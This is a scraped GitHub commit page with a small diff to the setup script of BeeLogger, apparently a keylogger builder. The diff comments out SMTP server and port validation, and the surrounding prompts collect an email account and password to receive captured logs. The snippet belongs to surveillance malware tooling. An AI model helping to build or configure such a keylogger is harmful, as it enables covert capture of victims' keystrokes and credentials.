File tree Expand file tree Collapse file tree 1 file changed +6
-6
lines changed
Expand file tree Collapse file tree 1 file changed +6
-6
lines changed Original file line number Diff line number Diff line change @@ -16,13 +16,13 @@ def begin():
1616 os .system ('sudo rm -Rf dist' )
1717 print "\n {0}You can see a list with servers and ports in SERVERS.txt on BeeLogger folder.{1}" .format (GREEN ,END )
1818 gh = raw_input ('\n Type email server (ex: \' smtp.gmail.com\' ): ' )
19- if len (gh ) != 1 or 'smtp' not in gh :
20- print "\n {0} [!] Please use a valid smtp server.{1}" .format (RED , END )
21- begin ()
19+ # if len(gh) != 1 or 'smtp' not in gh:
20+ # print "\n{0} [!] Please use a valid smtp server.{1}".format(RED, END)
21+ # begin()
2222 ghp = raw_input ('\n Type email server port (ex: \' 587\' ): ' )
23- if len (gh ) != 1 :
24- print "\n {0} [!] Please type a valid smtp server port.{1}" .format (RED , END )
25- begin ()
23+ # if len(gh) != 1:
24+ # print "\n{0} [!] Please type a valid smtp server port.{1}".format(RED, END)
25+ # begin()
2626 email = raw_input ('Type your email to receive logs: ' )
2727 epass = raw_input ('Type your email password: ' )
2828 print '\n '
You can’t perform that action at this time.
0 commit comments